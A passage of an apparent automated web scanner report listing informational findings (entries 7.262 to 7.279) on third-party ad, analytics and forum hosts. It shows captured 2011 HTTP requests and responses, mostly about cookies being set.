_ate.ad.hpr({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d5af32c71c2e1a5&curl=http%3a%2f%2fiwantmyname.com%2fservices%2furl-shortener%2fcloudapp-custom
...[SNIP]...

7.262. http://ds.addthis.com/red/psi/sites/www.capgemini.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.capgemini.com/p.json

Request

GET /red/psi/sites/www.capgemini.com/p.json?callback=_ate.ad.hpr&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.capgemini.com%2Fmy-capgemini%2F&1ku1seo HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh32.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298824784.60|1297806627.66; dt=X; psc=4; uid=4d5af32c71c2e1a5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 249
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 28 Feb 2011 17:51:43 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 30 Mar 2011 17:51:43 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298915503.60|1297806627.66; Domain=.addthis.com; Expires=Wed, 27-Feb-2013 02:56:51 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 28 Feb 2011 17:51:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 17:51:43 GMT
Connection: close

_ate.ad.hpr({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d5af32c71c2e1a5&curl=http%3a%2f%2fwww.capgemini.com%2fmy-capgemini%2f"],"segments" : ["60"],"l
...[SNIP]...

7.263. http://eatps.web.aol.com:9000/open_web_adhoc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eatps.web.aol.com:9000
Path:   /open_web_adhoc

Request

GET /open_web_adhoc?subtype=7055&sid=WINAMP&rid=MAIN HTTP/1.1
Host: eatps.web.aol.com:9000
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]

Response

HTTP/1.1 200 OK
P3P: CP="UNI CUR OUR"
Set-Cookie: POP_COOKIE=name=YTNkMTAxMjk4ODI4Njk1eA%3d%3d;Path=/;Domain=eatps.web.aol.com;Expires=Tue, 26 Feb 2013 17:44:55 GMT
Date: Sun, 27 Feb 2011 17:44:55 GMT
Content-Length: 15
Content-Type: text/plain

//Not Qualified

7.264. http://forums.winamp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.winamp.com
Path:   /

Request

GET / HTTP/1.1
Host: forums.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:42:29 GMT
Server: Apache
Set-Cookie: bblastvisit=1298828549; expires=Mon, 27-Feb-2012 17:42:29 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Mon, 27-Feb-2012 17:42:29 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 111158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>

<!
...[SNIP]...

7.265. http://forums.winamp.com/forumdisplay.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.winamp.com
Path:   /forumdisplay.php

Request

GET /forumdisplay.php?f=8 HTTP/1.1
Host: forums.winamp.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=ea76dc35499742119b5f293ea9989f5b; bblastvisit=1298828548; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; bblastactivity=0; s_pers=%20s_getnr%3D1298828732009-New%7C1361900732009%3B%20s_nrgvo%3DNew%7C1361900732010%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//forums.winamp.com/forumdisplay.php%2525253Ff%2525253D8%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:45:39 GMT
Server: Apache
Set-Cookie: bblastactivity=0; expires=Mon, 27-Feb-2012 17:45:39 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Set-Cookie: bbforum_view=69e4fbc86349a7a5cfb9f670fdc9bde629839986a-1-%7Bi-8_i-1298828739_%7D; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 124744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<met
...[SNIP]...

7.266. http://hootsuite.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hootsuite.com
Path:   /

Request

GET / HTTP/1.1
Host: hootsuite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=26142884.1298042216.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=26142884.1699279847.1298042216.1298042216.1298044541.2

Response

HTTP/1.1 200 OK
Server: HootSuite Server v1.1
Date: Tue, 01 Mar 2011 13:15:58 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: _SID=3064e27fe024aa99d841665c17adcfd394baba92; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Gridnum: 35
Vary: Accept-Encoding
Content-Length: 22631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="static" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="
...[SNIP]...

7.267. http://i.kissmetrics.com/i.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.kissmetrics.com
Path:   /i.js

Request

GET /i.js HTTP/1.1
Host: i.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://hootsuite.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=864000000, public
Content-Type: application/x-javascript
Date: Tue, 01 Mar 2011 13:15:58 GMT
ETag: "AP12qo960koJllHXyDr9ZmOHRvE"
Expires: Sat, 17 Jul 2038 13:15:58 GMT
Last-Modified: Tue, 01 Mar 2011 12:15:58 GMT
P3P: CP="NOI CURa ADMa DEVa TAIa OUR IND UNI INT"
Server: nginx
Set-Cookie: _km_cid=AP12qo960koJllHXyDr9ZmOHRvE;expires=Sat, 17 Jul 2038 13:15:58 GMT;path=/;
Content-Length: 79
Connection: keep-alive

var KMCID='AP12qo960koJllHXyDr9ZmOHRvE';if(typeof(_kmil) == 'function')_kmil();

7.268. http://ilove.klout.com/tr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ilove.klout.com
Path:   /tr.gif

Request

GET /tr.gif?param1=PARAM1&param2=PARAM2&param3=PARAM3&param4=PARAM4&param5=PARAM5&param6=PARAM6&cb=1298945320882&v=4&a=Mozilla/5.0%20%28Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US%29%20AppleWebKit/534.13%20%28KHTML%2C%20like%20Gecko%29%20Chrome/9.0.597.98%20Safari/534.13&t=The%20Standard%20for%20Online%20and%20Internet%20Influence%20%7C%20Klout&lcid=6f2ca7b2012e10009755722813cc6926&x0=Wed,&x1=29&x2=Feb&x3=2012&x4=02:08:40&x5=GMT&u=http%3A//klout.com/&e= HTTP/1.1
Host: ilove.klout.com
Proxy-Connection: keep-alive
Referer: http://klout.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: arrival_cookie=946777d531528b2bf363616794e8adfbf3a48382837f53a4fa6b4e82003a0526974db48ea4f920f48c3b864757984edb3b2affcac264f40be0a749dbeee6dcccaf73dc8a679fa939bfca6210272326684357b4a1eec6cb8fc932d3ed6a0a8f40aa83542a500525ba2c586f0403ca529fbb9359262d905db3103667ed0ff5c3e30599aafa7bfc86e7c0fd20683ba2f913c9065481b6b566c4368205c4dd0bc103eae209d9a08b4a373a6ad539ce16e4df1429504f76b570cf2aabd32c14984f3f7e12072f8ade69a7b5ff2200689db1b7; __utmz=261428178.1298945311.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=261428178.1003945043.1298945311.1298945311.1298945311.1; __utmc=261428178; __utmb=261428178.1.10.1298945311; __qca=P0-1165085945-1298945312517

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 01 Mar 2011 02:08:01 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
Set-Cookie: lcid=6f2ca7b2012e10009755722813cc6926; path=/; domain=.klout.com; expires=Wed, 29 Feb 2012 02:08:40 GMT;

GIF89a.............!.......,...........L..;

7.269. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTEwMzkmdGw9NDMyMDA=&piggybackCookie=6pgp44i37uxw HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh32.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:4470455573253905340; PUBRETARGET=78_1392641239.461_1392901736.403_1393381248.401_1393381248

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:39:45 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_133=1873-6pgp44i37uxw; domain=pubmatic.com; expires=Tue, 29-Mar-2011 16:39:45 GMT; path=/
Set-Cookie: PUBRETARGET=78_1392641239.461_1392901736.403_1393381248.401_1393381248.1039_1301416785; domain=pubmatic.com; expires=Wed, 26-Feb-2014 02:20:48 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

7.270. http://in.getclicky.com/in.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.getclicky.com
Path:   /in.php

Request

GET /in.php?site_id=66386088&res=1920x1200&lang=en&href=%2F&title=Project%20Syndicate%20-%20the%20highest%20quality%20op-ed%20(%20opinion-editorial%20)%20articles%20and%20commentaries&ref=&jsuid=3082234540994859644&mime=js&x=0.48294535814784467 HTTP/1.1
Host: in.getclicky.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:18:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: cluid=3082234540994859644; expires=Thu, 27-Feb-2031 02:18:16 GMT; path=/
P3P: CP='NOI DSP COR CUR OUR NID NOR'
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 0


7.271. http://int.teracent.net/tase/int  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Request

GET /tase/int?adv=206&fmt=redirect&sec=0&bizoid=3004,2002,4024 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MqfRR8u.X2P5yQ; imp=a$le#1298042817590_91057657_ap2105_int|; p42r=b$u-15#F.70M|c-54200#3.70M|g-c#3.70M|i-1021598#2.70M|i-1022917#2.70M|; p206r=b$u-88#F.71C|c-4024#3.71C|c-3004#2.71C|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p206r=b$u-88#K.74T|c-4024#4.74T|c-3004#3.74T|c-2002#1.74T|; Domain=.teracent.net; Expires=Fri, 26-Aug-2011 02:20:00 GMT; Path=/
Set-Cookie: imp=a$le#1298773200111_141958950_ap2102_int|; Domain=.teracent.net; Expires=Fri, 26-Aug-2011 02:20:00 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Sun, 27 Feb 2011 02:19:59 GMT
Connection: close

GIF89a.............!.......,...........D..;

7.272. http://ioerror.us/srv/www/ioerror.us/wp-content/plugins/word-press-flow-player/flowplayer/flowplayer-3.1.4.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ioerror.us
Path:   /srv/www/ioerror.us/wp-content/plugins/word-press-flow-player/flowplayer/flowplayer-3.1.4.min.js

Request

GET /srv/www/ioerror.us/wp-content/plugins/word-press-flow-player/flowplayer/flowplayer-3.1.4.min.js HTTP/1.1
Host: ioerror.us
Proxy-Connection: keep-alive
Referer: http://ioerror.us/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:19:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762357+173.193.214.243; path=/
Vary: Accept-Encoding, Cookie
X-Pingback: http://ioerror.us/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 26 Feb 2011 23:19:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 7317

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Page not found | Porcupine</title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="stylesheet" type
...[SNIP]...

7.273. http://klout.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://klout.com
Path:   /

Request

GET / HTTP/1.1
Host: klout.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 02:07:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: arrival_cookie=946777d531528b2bf363616794e8adfbf3a48382837f53a4fa6b4e82003a0526974db48ea4f920f48c3b864757984edb3b2affcac264f40be0a749dbeee6dcccaf73dc8a679fa939bfca6210272326684357b4a1eec6cb8fc932d3ed6a0a8f40aa83542a500525ba2c586f0403ca529fbb9359262d905db3103667ed0ff5c3e30599aafa7bfc86e7c0fd20683ba2f913c9065481b6b566c4368205c4dd0bc103eae209d9a08b4a373a6ad539ce16e4df1429504f76b570cf2aabd32c14984f3fcf5ae0991d79bbcc4adc5bdb5c2e2996; expires=Wed, 02-Mar-2011 02:07:49 GMT; path=/; domain=.klout.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 19946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Standard for
...[SNIP]...

7.274. https://lct.salesforce.com/sfga.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://lct.salesforce.com
Path:   /sfga.js

Request

GET /sfga.js HTTP/1.1
Host: lct.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/javascript
Date: Sat, 26 Feb 2011 23:16:08 GMT
Connection: close
Set-Cookie: BIGipServerlct-pool=204792330.38687.0000; path=/
Content-Length: 9247

var _kd = document;
var _kdlh = _kd.location.href;
var _ki,_kq,_kv;
var _kwtlForm;
var _kretURL;
var _kwtlOnSubmit;
var _koid;

function __krand() {
return Math.round(Math.random() * 256).toString
...[SNIP]...

7.275. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Request

GET /adcedge/lb?site=695501&betr=tc=1,99999,53575,53656,56768,56830,56835,60515,53615,52766,60130,50213,50239,60190&guidm=1:16lsqii1n1a3cr&bnum=77296 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=er080012979743200010; F1=BEIOh1EBAAAABAAAAEAAgEA; BASE=gKQkEmhpjJjpy24mVRcoq4SdsN4DbAA!; ROLL=AfAif6NO6AcM+tN!; aceRTB=rm=Tue, 22 Mar 2011 15:51:32 GMT|am=Tue, 22 Mar 2011 15:51:32 GMT|dc=Tue, 22 Mar 2011 15:51:32 GMT|an=Tue, 22 Mar 2011 15:51:32 GMT|; C2=LcEaNBr8Do2kGDBnjUAVLYkxs2TB1xmRI/KgFwpiGhsgiYQvJVUJSKMCItdBwhQ3WXAcIgJaGAHCFBqBwhgJjaAcIca4FAHCAGeBwNLxGMUqGb+kfbQucXc7mi/BqVlxu4KVHYGgG7C; GUID=MTI5ODY3OTU2MzsxOjE2bHNxaWkxbjFhM2NyOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 27 Feb 2011 02:32:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=BfbaNBr8Co2kGJMnjUAVLY8ds2TB1xmx59KgFwpiGnngiUQvJVs1SKMCItdBwhQ3WXAcIgJaGAHCFBqBwhgJjaAcIAY4FA3sEbwQpaEmT+tB5ydRfaK+GoWVGBurUZgZAaE4; domain=advertising.com; expires=Tue, 26-Feb-2013 02:32:33 GMT; path=/
Set-Cookie: GUID=MTI5ODc3Mzk1MzsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; domain=advertising.com; expires=Tue, 26-Feb-2013 02:32:33 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sun, 27 Feb 2011 03:32:33 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

7.276. http://lfov.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
ETag: W/"1406-1239369371000"
Last-Modified: Fri, 10 Apr 2009 13:16:11 GMT
Content-Length: 1406
Date: Sat, 26 Feb 2011 23:31:40 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/

..............h.......(....... ....................................I..=l!.}H).~1{..us...u...o...q.............##...U...Z..CC.........A...K...m...v.....................................................
...[SNIP]...

7.277. http://lfov.net/webrecorder/g/chimera.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/g/chimera.js

Request

GET /webrecorder/g/chimera.js?vid=null HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: LOOPFUSE=cd5c1df0-027f-4e40-b88b-91ea6f442021; Expires=Sun, 26-Feb-2012 23:19:50 GMT
Content-Length: 51
Date: Sat, 26 Feb 2011 23:19:50 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/


_lf_vid='cd5c1df0-027f-4e40-b88b-91ea6f442021';


7.278. http://lfov.net/webrecorder/js/listen.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/js/listen.js

Request

GET /webrecorder/js/listen.js HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Last-Modified: Sun, 13 Feb 2011 03:48:47 GMT
Cache-Control: max-age=604800, public
Pragma: public
Expires: Sat, 5 Mar 2011 18:17:37 GMT
Date: Sat, 26 Feb 2011 23:17:37 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/
Content-Length: 5132

var _lf_cid="";var i="";var _lf_mydomain="";var _lf_doc=document;var _lf_doc_title=_lf_doc.title;var _lf_currpage=window.location.href;var _lf_loopfusePageProtocol=window.location.protocol+"//";var _l
...[SNIP]...

7.279. http://lfov.net/webrecorder/w  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/w

Request

GET /webrecorder/w?cid=LF_82373698&vid=d6dd6c8f-6494-4502-b3f9-181cfe985eb3&from=&t=Web%20Content%20Management%20System%20%28CMS%29%20%7C%20Alterian%20Content%20Manager%20%7C&res=1920x1200&cp=http%3A//webcontent.alterian.com/%3Fc%3Dadwords%26l%3Dppc%26k%3Dcontent%2520management%2520system%26gclid%3DCIfL87X6pqcCFVln5QodaVjCBw&0.6970918371807784 HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Length: 0
Date: Sat, 26 Feb 2011 23:19:53 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/


